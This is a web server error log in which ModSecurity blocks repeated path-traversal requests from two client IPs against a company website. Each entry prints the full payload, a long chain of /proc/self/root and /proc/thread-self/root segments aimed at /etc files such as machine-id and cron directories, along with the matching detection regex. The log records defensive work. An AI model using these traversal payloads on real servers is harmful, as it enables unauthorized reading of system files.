[Tue Mar 17 08:31:22.538660 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.243.203:55814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7itCmCSWTlPouqorD3wAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:23.589001 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.46:58544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7iweiSKl8TjouI-b66gAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:23.881712 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.203:55816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7iweiSKl8TjouI-b66wAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:24.891031 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.241.46:57514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7jJDEJR9VXonE_-1GkQAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:26.067089 2026] [:error] [pid 1210:tid 140411708356352] [client 74.7.241.46:57530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7jlKJy4A1bGlmj9BOKAAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:26.186281 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.203:55828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7jqBJNF7axNlVR0X1ZQAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:27.358990 2026] [:error] [pid 2305:tid 140411716749056] [client 74.7.241.46:57546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7jwQohV2v-7oj5HHzawAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:27.437677 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.243.203:55842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7j5qmL8PQht4WJFlBGwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:28.661252 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.241.46:40816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7kBePVOt35XCGZP8n1QAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:28.767662 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:55854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7kNCmCSWTlPouqorD4QAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:29.835608 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.46:40830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7kaBJNF7axNlVR0X1ZgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:30.025062 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.243.203:55858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7klKJy4A1bGlmj9BOKQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:31.112254 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.241.46:40838] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7k9CmCSWTlPouqorD4gAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:32.253801 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.241.46:40844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7lJqmL8PQht4WJFlBHAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:34.447515 2026] [:error] [pid 1961:tid 140411607643904] [client 74.7.241.46:40860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7lXRXaaWotPICgYsdrgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:34.450309 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.243.203:58482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7le82sZHvlq4xgHq77gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:35.755494 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.46:40866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7l6BJNF7axNlVR0X1aAAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:35.839259 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:58496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7l9CmCSWTlPouqorD5AAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:36.948904 2026] [:error] [pid 11469:tid 140411540502272] [client 74.7.241.46:40872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7mJDEJR9VXonE_-1GlAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:37.142022 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.243.203:58498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7mZDEJR9VXonE_-1GlQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:38.254501 2026] [:error] [pid 11469:tid 140411641214720] [client 74.7.241.46:41824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7mpDEJR9VXonE_-1GlgAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
